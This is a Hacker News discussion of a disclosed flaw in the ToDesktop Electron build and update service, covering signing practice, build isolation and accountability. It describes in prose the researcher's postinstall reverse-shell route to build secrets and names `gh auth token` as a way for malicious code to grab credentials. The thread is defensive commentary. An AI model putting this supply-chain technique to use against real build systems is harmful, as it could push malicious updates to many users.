As an Electron maintainer, I'll re-iterate a warning I've told many people before: Your auto-updater and the underlying code-signing and notarization mechanisms are sacred. The recovery mechanisms for the entire system are extremely painful and often require embarrassing emails to customers. A compromised code-sign certificate is close to the top of my personal nightmares.
Dave and toDesktop have build a product that serves many people really well, but I'd encourage everyone building desktop software (no matter how, with or without toDesktop!) to really understand everything involved in compiling, signing, and releasing your builds. In my projects, I often make an argument against too much abstraction and long dependency chain in those processes.
If you're an Electron developer (like the apps mentioned), I recommend:
* Build with Electron Forge, which is maintained by Electron and uses @electron/windows-sign and @electron/osx-sign directly. No magic.
* For Windows signing, use Azure Trusted Signing, which signs just-in-time. That's relatively new and offers some additional recovery mechanisms in the worst case.
* You probably want to rotate your certificates if you ever gave anyone else access.
* Lastly, you should probably be the only one with the keys to your update server.
How about we don't build an auto-updater? Maybe some apps require an extremely tight coupling with a server, but we should try our best to release complete software to users that will work as close to forever as possible. Touching files on a user's system should be treated as a rare special occurrence. If a server is involved with the app, build a stable interface and think long and hard about every change. Meticulously version and maintain everything. If a server is involved, it is completely unacceptable for a server-side change to break an existing user's local application unless it is impossible to avoid - it should be seen as an absolute last resort with an apology to affected customers (agree with OP on this one).
It is your duty to make sure _all_ of your users are able to continue using the same software they installed in exactly the same way for the reasonable lifetime of their contract, the package, or underlying system (and that lifetime is measured in years/decades, with the goal of forever where possible. Not months).
You can, if you must, include an update notification, but this absolutely cannot disrupt the user's experience; no popups, do not require action, include an "ignore forever" button. If you have a good product with genuinely good feature improvements, users will voluntarily upgrade to a new package. If they don't, that is why you have a sales team.
Additionally, more broadly, it is not your app's job to handle updates. That is the job of your operating system and its package manager. But I understand that Windows is behind in this regard, so it is acceptable to compromise there.
We go a step further at my company. Any customer is able to request any previous version of their package at any time, and we provide them an Internet download page or overnight ship them a CD free of charge (and now USB too).
> Maybe some apps require an extremely tight coupling with a server, but we should try our best to release complete software to users that will work as close to forever as possible.
That sounds like a good idea. Unless you’re the vendor, and instead of 1000 support requests for version N, you’re now facing 100 support requests for version N, 100 for N−1, 100 for N−2, …, and 100 for N−9.
You're allowed to have a support matrix. You can refuse to support versions that are too old, but you can also just... let people keep using programs on their own computers.
And it's not like B2B doesn't get whacked by bad software or bad actors regulalry. The idea that software updates itself is vastly more benefitial than harmful in the very long term. There so many old machines running outdated software in gated corporate networks, they will get owned immediately once a single one of them is compromised in any way. They are literally trading minor inconveniences for a massive time-bomb with a random timer.
The two sides of your thought are going head to head. "Gated corporate networks" don't benefit from software that "updates itself" (unless we're talking about pure SaaS). It's exactly where auto-updating is completely useless because any company with a functioning IT will go out of its way to not delegate the decisions of when to update or what features are forced in out to the developer and their product manager.
Auto-updates mostly ever practically happen for software used at home or SMB which might not have a functioning IT. If security is the concern why not use auto-updates only for security updates? Why am I gaining features I explicitly did not want, or losing the ones which were the reason I bought the software in the first place? Why does the dev think I am not capable of deciding for myself if or when to update? I have a solid theory of why and it involves an MBA-type person thinking anyone using <$300 software just can't think for themselves and if this line of thought cuts some costs or generates some revenue all the better.
Sure. I’d rather have it be provided by the platform. It’s a lot of work to maintain for 5 OSs (3 desktop, 2 mobile).
> we should try our best to release complete software to users that will work as close to forever as possible
This isn’t feasible. Last I tried to support old systems on my app, the vendor (Apple) had stopped supporting and didn’t even provide free VMs. Windows 10 is scheduled for non-support this year (afaik). On Linux glibc or gtk will mess with any GUI app after a few years. If Microsoft, Google and Apple can’t, why the hell should I as a solo app developer? Plus, I have 5 platforms to worry about, they only have their own.
> Touching files on a user's system should be treated as a rare special occurrence.
Huh? That’s why I built an app and not a website in the first place. My app is networked both p2p and to api and does file transfers. And I’m supposed to not touch files?
> If a server is involved with the app, build a stable interface and think long and hard about every change.
Believe me, I do. These changes are as scary as database migrations. But like those, you can't avoid them forever. And for those cases, you need at the very least to let the user know what’s happening. That’s half of the update infrastructure.
Big picture, I can agree with the sentiment that ship fast culture has gone too far with apps and also we rely on cloud way too much. That’s what the local first movement is about.
At the same time, I disagree with the generalization seemingly based on a narrow stereotype of an app. For most non-tech users, non-disruptive background updates are ideal. This is what iOS does overnight when charging and on WiFi.
I have nothing against disabling auto updates for those who like to update their own software, but as a default it would lead to massive amounts of stale non-working software.
> file transfers. And I’m supposed to not touch files?
I'm pretty sure you know what I meant, it's obvious from context. System program files. The files that are managed by your user's package manager (and by extension their IT department)
There isn’t a package manager in many cases: windows store requires a MS account. macOS app store nerfs apps by sandbox restrictions. Linux has so many flavors of package managers it’s death by 1000 paper cuts. None of the major bundlers like flutter, electron and tauri support all these package managers and/or app stores. Let alone running the infrastructure for it.
Which leaves you with self-updaters. I definitely agree ideally it shouldn’t be the applications job to update itself. But we don’t live in that world atm. At the very least you need to check for updates and EOL circuit breakers for apps that aren’t forever- local only apps. Which is not a niche use-case even if local-first infra was mature and widely adopted, which it very much isn’t.
Anyway, my app works without internet, pulls no business logic at runtime (live updates) and it uses e2ee for privacy. That’s way more than the average ad-funded bait-and-switch ware that plague the majority of commercial software today. I wish I didn’t have to worry about updates, but the path to less worries and healthy ecosystem is not to build bug-free forever-software on top of a constantly moving substrate provided largely by corporations with multiple orders of magnitude more funding than the average software development company.
I do agree with you but I think that unfortunately you are wrong on the job of updates. You have an idealistic vision that I share but well, it remains idealistic.
Apart from, maybe, Linux distros, neither Apple or Microsoft are providing anything to handle updates that isn’t a proprietary store with shitty rules.
For sure the rules are broken on desktop OSs but by the meantime, you still have to distribute and update your software. Should the update be automatic ? No. Should you provide an easy way to update ? I’d said that at the end it depends on if you think it’s important to provide updates to your users. But should you except your users or their OSs to somehow update your app by themselves ? Nope.
This is actually precisely how package management works in Linux today... you release new versions, package maintainers package and release them, while ensuring they actually work. This is a solve problem, it's just that nobody writing JavaScript is old enough to realize it's an option.
And that's why I said "apart for Linux". Where are the package maintainers on the OSes everyone uses ? (and don't think that's sarcasm, I'm writing this comment on my linux desktop).
My exact thought as well, simply point the user to a well established and proper channel for auto updates and then the dev simply needs to upload/release to said repos when a new version is put out. As an aside: Chocolatey is currently the only (stable/solid) way to consistently keep things up to date on the Win platform in my book.
Have a shoe-box key, a key which is copied 2*N (redundancy) times and N copies are stored in 2 shoe-boxes. It can be on tape, or optical, or silicon, or paper. This key always stays offline. This is your rootiest of root keys in your products, and almost nothing is signed by it. The next key down which the shoe-box key signs (ideally, the only thing) is for all intents and purposes your acting "root certificate authority" key running hot in whatever highly secure signing enclave you design for any other ordinary root CA setup. Then continue from there.
Your hot and running root CA could get totally pwned, and as long as you had come to Jesus with your shoe-box key and religiously never ever interacted with it or put it online in any way, you can sign a new acting root CA key with it and sign a revocation for the old one. Then put the shoe-box away.
I mean sure but is that possible for OS builds? Generally you will generate a private key, get a cert for it, give it to Apple so they sign it with their key and then you use the private key to sign your build. I have never seen a guide do a two level process and I am nof convinced it is allowed.
2. Because that requires you to know how to find the hash and add it.
Truthfully the burden should be on the third party that's serving the script (where did you copy that HTML in the first place?) but they aren't incentivizes to have other sites use a hash.
Well, to be honest, the browsers could super easily solve that. In dev mode, just issue a warning "loaded script that has hash X but isn't statically defined. This is a huge security risk. Read more here" and that's it. Then you can just add the script, run the site, check the logs and add the hash, done.
There's plenty of magic. I think that Electron Forge does too many things, like trying to be the bundler. Is it possible to set up a custom build system / bundling with it or are you forced to use Vite? I guess that even if you can, you pull all those dependencies when you install it and naturally you can't opt out from that. Those dev dependencies involved in the build process are higher impact than some production dependencies that run in a sandboxed tab process (because a tiny malicious dependency could insert any code into the app's fully privileged process). I have not shipped my app yet, but I am betting on ESBuild (because it's just one Go binary) and Electron Builder (electron.build)
Azure Trusted Signing is one of the best things Microsoft has done for app developers last year, I'm really happy with it. It's $9.99/month and open both to companies and individuals who can verify their identity (it used to only be companies). You really just call signtool.exe with a custom dll.
The big limitation with Azure Trusted Signing is that your organization needs to be at least 3 years old. Seems to be a weird case where developers that could benefit from this solution are pushed towards doing something else, with no big reason to switch back later.
That limitation should go away when Trusted Signing graduates from preview to GA. The current limitation is because the CA rules say you must perform identity validation of the requester for orgs younger than 3 years old, which Microsoft isn't set up for yet.
I recently checked it out as an alternative to renewing our signing cert, but it doesn't support issuing EV certs.
I've understood it as having an EV code signing cert on Windows is required for drivers, but somehow also gives you better SmartScreen reputation making it useful even for user space apps in enterprisey settings?
Not sure if this is FUD spread by the EV CA's or not though?
And yet, tons of developers install github apps that ask for full permissions to control all repos and can therefore do to same things to every dev usings those services.
github should be ashamed this possibility even exists and double ashamed that their permission system and UX is so poorly conceived that it leads apps to ask for all the permissions.
IMO, github should spend significant effort so that the default is to present the user with a list of repos they want some github integration to have permissions for and then for each repo, the specific permissions needed. They should be designed that minimal permissions is encouraged.
As it is, the path of least resistance for app devs is "give me root" and for users to say "ok, sure"
Why spend that effort when any code you run on your machine (such as dependency post-install scripts, or the dependencies themselves!) can just run `gh auth token` can grab a token for all the code you push up.
By design, the gh cli wants write access to everything on github you can access.
I personally haven't worked with many of the github apps that you seem to refer to but the few that I've used are only limited to access the specific repositories that I give and within those repositories their access control is scoped as well. I figured this is all stuff that can be controlled on Github's side. Am I mistaken?
This vulnerability was genuinely embarrassing, and I'm sorry we let it happen. After thorough internal and third-party audits, we've fundamentally restructured our security practices to ensure this scenario can't recur. Full details are covered in the linked write-up. Special thanks to Eva for responsibly reporting this.
> We resolved the vulnerability within 26 hours of its initial report, and additional security audits were completed by February 2025.
After reading the vulnerability report, I am impressed at how quickly you guys jumped on the fix, so kudos. Did the security audit lead to any significant remediation work? If you weren't following PoLP, I wonder what else may have been overlooked?
That was solid. Nice way to handle a direct personal judgement!
Not your first rodeo.
Another way is to avoid absolutes and ultimatums as aggressively as one should avoid personal judgements.
Better phrased as: "we did our best to prevent this scenario from happening again.
Fact is it just could happen! Nobody likes that reality, and overall when we think about all this stuff, networked computing is a sad state of affairs..
Best to just be 100 percent real about it all, if you ask me.
At the very least people won't nail you on little things, which leaves you something you may trade on when a big thing happens.
And yeah, this is unsolicited and worth exactly what you paid. Was just sharing where I ended up on these things in case it helps
If you think someone is obviously wrong, it might be worth pausing for a second and considering where you might just be referring to different things. Here, you seem to understand “this” to mean “a serious bug.” Since it’s obvious that a serious bug could happen, it seems likely that the author meant “this” to mean “the kind of bug that led to the breach we’re presently discussing.”
This is the wrong response, because that means that the learning would be lost. The security community didn't want that to happen when one of the CA's got a vulnerability, we do not want it to happen to other companies. We want companies to succeed and get better, being shameful doesn't help towards that. Learning the right lessons does, and resigning means that you are learning the wrong ones.
I suggest reading one or two of Sydney Dekker’s books, which are a pretty comprehensive takedown of this idea. If an organization punishes mistakes, mistakes get hidden, covered up, and no less frequent.
> If you get a slap on the wrist, do you learn? No, you play it down.
Except Dave didn't play it down. He's literally taking responsibility for a situation that could have resulted in significantly worse consequences.
Instead of saying, "nothing bad happened, let's move on," he, and by extension his company, have worked to remedy the issue, do a write up on it, disclose of the issue and its impact to users, and publicly apologize and hold themselves accountable. That right there is textbook engineering ethics 101 being followed.
Under what theory of psychology are you operating? This is along the same lines as the theory that punishment is an effective deterrent of crime, which we know isn’t true from experience.
> While I think that resigning is stupid here, asserting that "punishment doesn't deter crime" is just absurd. It does!
Punishment does not deter crime. The threat of punishment does to a degree.
IOW, most people will be unaware of a person being sent to prison for years until and unless they have committed a similar offense. But everyone is aware of repercussions possible should they violate known criminal laws.
Honestly I don't get why people are hating this response so much.
Life is complex and vulnerabilities happen. They quickly contacted the reporter (instead of sending email to spam) and deployed a fix.
> we've fundamentally restructured our security practices to ensure this scenario can't recur
People in this thread seem furious about this one and I don't really know why. Other than needing to unpack some "enterprise" language, I view this as "we fixed some shit and got tests to notify us if it happens again".
To everyone saying "how can you be sure that it will NEVER happen", maybe because they removed all full-privileged admin tokens and are only using scoped tokens? This is a small misdirection, they aren't saying "vulnerabilities won't happen", but "exactly this one" won't.
So Dave, good job to your team for handling the issue decently. Quick patches and public disclosure are also more than welcome. One tip I'd learn from this is to use less "enterprise" language in security topics (or people will eat you in the comments).
Point taken on enterprise language. I think we did a decent job of keeping it readable in our disclosure write-up but you’re 100% right, my comment above could have been written much more plainly.
Annual pen tests are great, but what are you doing to actually improve the engineering design process that failed to identify this gap? How can you possibly claim to be confident this won't happen again unless you myopically focus on this single bug, which itself is a symptom of a larger design problem.
These kinds of "never happen again" statements never age well, and make no sense to even put forward.
A more pragmatic response might look like: something similar can and probably will happen again, just like any other bugs. Here are the engineering standards we use ..., here is how they compare to our peers our size ..., here are our goals with it ..., here is how we know when to improve it...
With privileged access, the attackers can tamper with the evidence for repudiation, so although I'd say "nothing in the logs" is acceptable, not everyone may. These two attack vectors are part of the STRIDE threat modeling approach.
Sounds like it was handled better than the authors last article where the Arc browser company initially didn't offer any bounty for a similar RCE, then awarded a paltry $2k after getting roasted, and finally bumped it up to $20k after getting roasted even more.
Well for one it was a gift so there is no valid contract right? There are no direct damages because there is nothing paid and nothing to refund. Wrt indirect damages, there's bound to be a disclaimer or two, at least at the app layer.
If you give someone a bomb, or give someone a USB stick with a virus, or give someone a car with defective break, you are absolutely liable. Think about it.
This is the second big attack found by this individual in what... 6 months? The previous exploit (which was in Arc browser), also leveraged a poorly configured firebase db: https://kibty.town/blog/arc/
So this is to say, at what point should we start pointing the finger at Google for allowing developers to shoot themselves in the foot so easily? Granted, I don't have much experience with firebase, but to me this just screams something about the configuration process is being improperly communicated or overall is just too convoluted as a whole.
Details like proper usage, security, etc. Those are often overlooked. Google isn't to blame if you ship a paid product without running a security audit.
I use firebase essentially for hobbyist projects for me and my friends.
If I had to guess these issues come about because developers are rushing to market. Not Google's fault ... What works for a prototype isn't production ready.
> Google isn't to blame if you ship a paid product without running a security audit.
Arguably, if you provide a service that makes it trivial to create security issues (that is to say, you have to go out of your way to use it correctly) then it's your fault. If making it secure means making it somewhat less convenient, it's 100% your fault for not making it less convenient.
What if I need to hack together a POC for 3 people to look at.
It's my responsibility to make sure when we scale from 3 users to 30k users we take security seriously.
As my old auto shop teacher used to say, if you try to idiot proof something they'll build a better idiot.
Even if Google warns you in big bold print "YOU ARE DOING SOMETHING INSECURE", someone out there is going to click deploy anyway. You're arguing Google disable the deploy button, which I simply disagree with.
I think that's throwing the baby out with the bathwater; sane defaults are still an important thing to think about when developing a product. And for something as important as a database, which usually requires authentication or storing personal information, let your tutorials focus on these pain points instead of the promise of a database-driven app with only clientside code. It's awesome, but I think it deserves the notoriety for letting you shoot yourself in the foot and landing on the front page of HN. Author also found a similar exploit via Firebase for the Arc Browser[0]
I don't know what exactly happened here, but Firebase has two defaults. Test access rules which auto expire and are insecure, or production rules which require auth.
If you do something stupid, like keep ignoring the insecure warning and updating them so they don't expire, that's your fault.
In no other industry do workers blame their tools.
The issue usually lies in there not being enough security rules in place, not in keeping insecure rules active. For instance, for the Arc incident which we were given more information on, it was due to not having a security rule in place to prevent unauthorized users from updating the user_id on Arc Boosts in the Firestore.
Go into any other industry and hear when they say, "shoot yourself in the foot", and you've likely stumbled upon a situation where they blame their tools for making it too easy to do the wrong thing.
If you don't setup any access rules in Firebase, by default it'll deny access.
This means someone setup these rules improperly. Even if, you're responsible for the tools you use. We're a bunch of people getting paid 150k+ to type. It's not out of the question to read documentation and at a minimum understand how things work.
That said I don't completely disagree with you, if Firebase enables reckless behavior maybe it's not a good tool for production...
And I don't necessarily disagree either; good callout that it _was_ about improperly configured ACL's, I meant more that it wasn't related to keeping test rules alive.
For 150k+ salaries, frontend dev salaries are generally a lot less than their backend counterparts. And scrappy startups might not have cash for competitive salaries or senior engineers. I think these are a few of the reasons why Firebase becomes dangerous.
Any purported expert who uses software without considering its security is simply negligent. I'm not sure why people are trying to spin this to avoid placing the blame on the negligent programmer(s).
Weak programmers do this to defend this group making crap software. I agree that defaults should be secure and maybe there should be request limit on admin, full access token - but then people will just create another token with full access and use it.
I’ve seen devs deploy production software with the admin password being “password”. I don’t think you are listening when they are saying “they’ll build a better idiot”.
That's why we don't have seatbelts of safety harnesses or helmets or RCDs. There's always going to be an idiot that drives without a seatbelt so why bother at all right?
The white house recently said a lot of things. But of all things, I don’t think they’re even qualified to have an opinion about software, or medical advice, or… well, anything that generally requires an expert.
I don't think Firebase is really at fault here—the major issue they highlighted is that the deployment pipeline uploaded the compiled artifact to a shared bucket from a container that the user controlled. This doesn't have anything to do with firebase—it would have been just as impactful if the container building the code uploaded it to S3 from the buildbot.
Agreed. I recently stumbled upon the fact that even Hacker News is using Firebase for exposing an API for articles. Caution should be taken when writing server-side software in general.
The problem is that if there is a security incident, basically nobody cares except for some of us here. Normal people just ignore it. Until that changes, nothing you do will change the situation.
I always find unbelievable how we NEVER hold developers accountable.
Any "actual" Engineer would be (at least the one signing off, but in software developers never sign off anything - and maybe that's the problem).
> update: cursor (one of the affected customers) is giving me 50k USD for my efforts.
Kudos to cursor for compensating here. They aren't necessarily obliged to do so, but doing so demonstrates some level of commitment to security and community.
"i wanted to get on the machine where the application gets built and the easiest way to do this would be a postinstall script in package.json, so i did that with a simple reverse shell payload"
Just want to make sure I understand this. They made a hello world app and submitted it to todesktop with a post install script that opened a reverse shell on the todesktop build machine? Maybe I missed it but that shouldn't be possible. Build machine shouldn't have outbound open internet access right?? Didn't see that explained clearly but maybe I'm missing something or misunderstanding.
In what world do you have a machine which downloads source code to build it, but doesn't have outbound internet access so it can't download source code or build dependencies?
Like, effectively the "build machine" here is a locked down docker container that runs "git clone && npm build", right? How do you do either of those activities without outbound network access?
And outbound network access is enough on its own to create a reverse shell, even without any open inbound ports.
The miss here isn't that the build container had network access, it's that the build container both ran untrusted code, and had access to secrets.
It's common, doesn't mean it's secure.
A lot of linux distros in their packaging will separate download (allows outbound to fetch dependencies), from build (no outside access).
Unfortunately, in some ecosystems, even downloading packages using the native package managers is unsafe because of postinstall scripts or equivalent.
Even if your builders are downloading dependencies on the fly, you can and should force that through an artifact repository (e.g. artifactory) you control. They shouldn't need arbitrary outbound Internet access. The builder needs a token injected with read-only pull permissions for a write-through cache and push permissions to the path it is currently building for. The only thing it needs to talk to is the artifactory instance.
If you don't network isolate your build tooling then how do you have any confidence that your inputs are what you believe them to be? I run my build tools in a network namespace with no connection to the outside world. The dependencies are whatever I explicitly checked into the repo or otherwise placed within the directory tree.
You don't have any confidence beyond what lockfiles give you (which is to say the npm postinstall scripts could be very impure, non-hermetic, and output random strings). But if you require users to vendor all their dependencies, fully isolate all network traffic during build, be perfectly pure and reproducible and hermetic, presumably use nix/bazel/etc... well, you won't have any users.
If you want a perfectly secure system with 0 users, it's pretty easy to build that.
I'm not suggesting that a commercial service should require this. You asked "In what world do you have ..." and I'm pointing out that it's actually a fairly common practice. Particularly in any security conscious environment.
Anyone not doing it is cutting corners to save time, which to be clear isn't always a bad thing. There's nothing wrong if my small personal website doesn't have a network isolated fully reproducible build. On the other hand, any widely distributed binaries definitely should.
For example, I fully expect that my bank uses network isolated builds for their website. They are an absolutely massive target after all.
Most banks and larger enterprises do exactly this. Devs don't get to go out and pick random libraries with out a code review and then it's placed on a local repository.
There are just far too many insecure and 'typo' malware to pull off the internet raw.
This is npm with all dependencies stored in a directory. Check them in. You do code review your dependencies right? Everywhere I’ve worked in the last 10 years has required this. There is no fetching of dependencies in builds. Granted, this is harder to pull off if your devs are developing on a totally different cpu architecture than production (fuck you apple).
There are plenty of worlds that take security more seriously and practice defense in depth. Your response could use a little less hubris and a more genuinely inquisitive tone. Looks like others have already chimed in here but to respond to your (what feels like sarcasm) questions:
- You can have a submission process that accepts a package or downloads dependencies, and then passes it to another machine that is on an isolated network for code execution / build which then returns the built package and logs to the network facing machine for consumption.
Now sure if your build machine is still exposing everything on it to the user supplied code (instead of sandboxing the actual npm build/make/etc.. command) you could insert malicious code that zips up the whole filesystem, env vars, etc.. and exfiltrates them through your built app in this case snagging the secrets.
I don't disagree that the secrets on the build machine were the big miss, but I also think designing the build system differently could have helped.
You have to meet your users where they are. Your users are not using nix and bazel, they're using npm and typescript.
If your users are using bazel, it's easy to separate "download" from "build", but if you're meeting your users over here where cows aren't spherical, you can't take security that seriously.
The simple solution would be to check your node-modules folder into source control. Then your build machine wouldn’t need to download anything from anywhere except your repository.
Isn't it really common for build machines to have outbound internet access? Millions of developers use GitHub Actions for building artifacts and the public runners definitely have outbound internet access
Indeed, you can indeed punch out from an actions runner. Such a thing is probably against GitHub's ToS, but I've heard from my third cousin twice removed that his friend once ssh'ed out from an action to a bastion host, then used port forwarding to get herself a shell on the runner in order to debug a failing build.
So this friend escaped from the ephemeral container VM into the build host which happened to have a private SSH on it that allowed it to connect to a bastion host to... go back to the build host and debug a failed build that should be self-contained inside the container VM which they already had access in the first place by the means of, you know, running a build on it? Interesting.
A few decades ago, it was also really common to smoke. Common != good, github actions isn't a true build tool, it's an arbitrary code runtime platform with a few triggers tied to your github.
It is and regardless a few other commenters saying or hinting it isn't...it is. An air gapped build machine wouldn't work for most software built today.
Strange. How do things like Nix work then? The nix builders are network isolated. Most (all?) Gentoo packages can also be built without network access. That seems like it should cover a decent proportion of modern software.
Instances where an air gapped build machine doesn't work are examples of developer laziness, not bothering to properly document dependencies.
Ya too many people think it's a great idea to raw dog your ci/cd on the net and later get newspaper articles written about the data leak.
The number of packages that is malicious is high enough, then you have typo packages, and packages that get compromised at a later date. Being isolated from the net with proper monitoring gives a huge heads up when your build system suddenly tries to contact some random site/IP.
I'm a huge fan of the writing style. it's like hacking gonzo, but with literally 0 fluff. amazing work and an absolute delight to read from beginning to end
Obnoxious is a bit harsh - I liked the feeling it gave to the article, found it very readable and I had no trouble discerning sentences, especially with how they were broken up into paragraphs.
Yeah, it is their fault. I don't download "todesktop" (to-exploit), I download Cursor. Don't give 3rd parties push access to all your clients, that's crazy. How can this crappy startup build server sign a build for you? That's insane.
it blows me away that this is even a product. it's like a half day of dev time, and they don’t appear to have over-engineered it or even done basic things given the exploit here.
Software developers don't actually write software anymore, they glue together VC-funded security nightmares every 1-3 years, before moving on to the next thing. This goes on and on until society collapses under its own weight.
In my experience, blame for this basically never lies on grunt-level devs; it's EMs and CTOs/CIOs who insist on using third-party products for everything out of some misguided belief that it will save dev time and it's foolish to reinvent the wheel. (Of course, often figuring out how to integrate a third-party wheel, and maintain the integration, is predictably far more work for a worse result than making your own wheel in the first place, but I have often found it difficult to convince managers of this. In fairness, occasionally they're right and I'm wrong!)
With all due respect, a compile pipeline across Win, Mac, Linux, for different CPU architectures, making sure signing works for all, and that the Electron auto-updater works as expected is a nightmare. I have been there, and it’s not fun.
> i wanted to get on the machine where the application gets built and the easiest way to do this would be a postinstall script in package.json, so i did that with a simple reverse shell payload
From ToDesktop incident report,
> This leak occurred because the build container had broader permissions than necessary, allowing a postinstall script in an application's package.json to retrieve Firebase credentials. We have since changed our architecture so that this can not happen again, see the "Infrastructure and tooling" and "Access control and authentication" sections above for more information about our fixes.
I'm curious to know what the trial/error here was to get their machine to spit out the build or if it was in one-shot
With rhe number of dependencies and dependency trees going multiple levels deep? Third party risk is the largely unaddressed elephant in the room that companies don't care about.
-paid operating system (rhel) with a team of paid developers and maintainers verifying builds and dependencies.
- empty dependencies. Only what the core language provides.
It's not that great of a sacrifice. Like 20$/mo for the OS. And like 2 days of dev work which pays itself off in the long run by avoiding a mass of code you don't understand
"the build container now has a privileged sidecar that does all of the signing, uploading and everything else instead of the main container with user code having that logic."
Does this info about the fix seem alarming to anyone else? It's not a full description, so maybe some important details are left out? My understanding is that containers are generally not considered a secure enough boundary. Companies such as AWS use micro VMs (Firecracker) for secure multi tenant container workloads.
Oof. I already have enough stress of my own autoupdating, single-file remote access tool I run on all of my computers, given at a small part of the custom OTA mechanics' security is by obscurity. Would make sleeping hard owning something as popular as this.
I’d like to see some thoughts on where we go from here. Is there a way we can keep end users protected even despite potential compromise of services like ToDesktop?
(eg: companies still hosting some kind of integrity checking service themselves and the download is verified against that… likely there’s smarter ideas)
The user experience of auto-update is great, but having a single fatal link in the chain seems worrying. Can we secure it better?
Ironically, it actually helped me stay focused on the article. Kind of like a fidget toy. When part of my brain would get bored, I could just move the cat and satisfy that part of my brain while I keep reading.
I know that sounds kind of sad that my brain can't focus that well (and it is), but I appreciated the cat.
We have reviewed logs and inspected app bundles. No malicious usage was detected. There were no malicious builds or releases of applications from the ToDesktop platform.
Is there an easy way to validate the version of Cursor one is running against the updated version by checking a hash or the like?
The javascript world has a culture of lots of small dependencies that end up becoming a huge tree no one could reasonable vendor or audit changes for. Worse these small dependencies churn much faster than for other languages.
With that culture supply chain attacks and this kind of vulnerability will keep happening a lot.
You want few dependencies, you want them to be widely used and you want them to be stable. Pulling in a tree of modules to check if something is odd or even isn't a good idea.
As usual, I read the comments here first. I'm glad I read the article though because the comments here have pretty much nothing to do with the vulnerability. Here's a summary because the article actually jumps over explaining the vulnerability in the gap between two paragraphs:
This service is a kind of "app store" for JS applications installed on desktop machines. Their service hosts download assets, with a small installer/updater application running on the users' desktop that pulls from the download assets.
The vulnerability worked like this: the way application publishers interact with the service is to hand it a typical JS application source code repo, which the service builds, in a container in typical CI fashion. Therefore the app publisher has complete control over the build environment.
Meanwhile, the service performs security-critical operations inside that same container, using credentials from the container image. Furthermore, the key material used to perform these operations is valid for all applications, not just the one being built.
These two properties of the system: 1. build system trusts the application publisher (typical, not too surprising) and 2. build environment holds secrets that allow compromise of the entire system (not typical, very surprising), over all publishers not just the current one, allow a malicious app publisher to subvert other publishers' applications.
My goodness. So much third-party risk upon risk and lots of external services opening up this massive attack surface and introducing this RCE vulnerability.
From an Electron bundler service, to sourcemap extraction and now an exposed package.json with the container keys to deploy any app update to anyone's machine.
This isn't the only one, the other day Claude CLI got a full source code leak via the same method from its sourcemaps being exposed.
But once again, I now know why the entire Javascript / TypeScript ecosystem is beyond saving given you can pull the source code out of the sourcemap and the full credentials out of a deployed package.json.
Blaming Js/Ts is ridiculous. All those same problems exist in all environments. Js/Ts is the biggest so it gets the most attention but if you think it's different in any other environment you're fooling yourself.
> But once again, I now know why the entire Javascript / TypeScript ecosystem is beyond saving given you can pull the source code out of the sourcemap and the full credentials out of a deployed package.json.
You've always been able to do the first thing though: the only thing you can do is obfuscate the source map, but it's not like that's a substantial slowdown when you're hunting for authentication points (identify API URLs, work backwards).
And things like credentials in package.json is just a sickness which is global to computing right now: we have so many ways you can deploy credentials, basically 0 common APIs which aren't globals (files or API keys) and even fewer security tools which acknowledge the real danger (protecting me from my computers system files is far less valuable then protecting me from code pretending to be me as my own user - where all the real valuable data already is).
Basically I'm not convinced our security model has ever truly evolved beyond the 1970s where the danger was "you damage the expensive computer" rather then "the data on the computer is worth orders of magnitude more then the computer".
I'm shocked at how insecure most software is these days. Probably 90% of software built by startups has a critical vulnerability. It seems to keep getting worse year on year. Before, you used to have to have deep systems knowledge to trigger buffer overflows. It was more difficult to find exploits. Nowadays, you just need basic understanding of some common tools, protocols and languages like Firebase, GraphQL, HTTP, JavaScript. Modern software is needlessly complicated and this opens up a lot of opportunities.
> [please don't] make it seem like it's their fault, it's not. it's todesktop's fault if anything
What?! It's not some kind of joke. This could _already_ literally kill people, stole money and ruin lives.
It isn't even an option to avoid taking reaponsibility for the decisions which lead to security and safety of users for any app owner/author.
It's as simple as this: no safety record to 3rd party - no trust, for sure. No security audit - no trust. No transparency in the audit - no trust.
Failing to make the right decision does not exempt from the liability, and should not.
Is it a kindergarden with "it's not me, it's them" play? It does not matter who failed, the money could has been be stolen already from the random ones (who just installed an app wrapped with this todesktop installer), and journalists could have been tracked and probably already killed in some dictatorship or conflict.
Bad decisions does not always make the bad owner.
But don't take it lightly, and don't advocate (for those who just paid you some money) "oh, they are innocent". As they are not. Be a grown-up, please, and let's make this world better together.
The problem is that this entire sclerotic industry is so allergic to accountability, that, if you want people to start, you probably have to fire 90% of the workforce. If it were up to me, the developers responsible for this would never write software "professionally" again.
The industry (or a couple of generations currently inhabiting it) could start with at least accepting responsibility when something goes wrong. Let me be clear: it's not about ending the "blameless culture" in engineering. No. It's about ending the culture of not taking any responsibility at all, when things go south. See the difference.
> security incidents happen all the time, its natural. what matters is the company's response, and todesktop's response has been awesome, they were very nice to work with.
it’s a blog. people regularly use their personal sites to write in a tone and format that they are fond of. i only normally feel like i see this style from people who were on the internet in the 90s. i’d imagine we would see it even more if phones and auto correct didn’t enforce a specific style. imagine being a slave to the shift key. it can’t even fight back! i’m more upset the urls aren’t actually clickable links.
Finding an RCE for every computer running cursor is cool, and typing in all lowercase isn’t that cool. Finding an RCE on millions of computers has much much higher thermal mass than typing quirks, so the blog post makes typing in all lowercase cool.
I can't post things like "what a bunch of clowns" due to hacker news guidelines so let me go by another more productive route.
These people, the ones who install dependencies (that install dependencies)+, these people who write apps with AI, who in the previous season looped between executing their code and searching the error on stackoverflow.
Whether they work for a company or have their own startup, the moment that they start charging money, they need to be held liable when shit happens.
When they make their business model or employability advantage to take free code in the internet, add pumpkin spice and charge cash for it, they cross the line from pissing passionate hackers by defiling our craft, to dumping in the pool and ruining it for users and us.
It is not sufficient to write somewhere in a contract that something is as is and we hold harmless and this and that. Buddy if you download an ai tool to write an ai tool to write an ai tool and you decided to slap a password in there, you are playing with big guns, if it gets leaked, you are putting other services at risk, but let's call that a misdemeanor. Because we need to reserve something stronger for when your program fails silently, and someone paid you for it, and they relied on your program, and acted on it.
That's worse than a vulnerability, there is no shared responsibility, at least with a vuln, you can argue that it wasn't all your fault, someone else actively caused harm. Now are we to believe the greater risk of installing 19k dependencies and programming ai with ai is vulns? No! We have a certainty, not a risk, that they will fuck it up.
Eventually we should license the field, but for now, we gotta hold devs liable.
Give those of us who do 10 times less, but do it right, some kind of marketing advantages, it shouldn't be legal that they are competing with us. A vscode fork got how much in VC funding?
My brothers lets take arms and defend. And defend quality software I say. Fear not writing code, fear not writing raw html, fear not, for they don't feel fear so why should you?
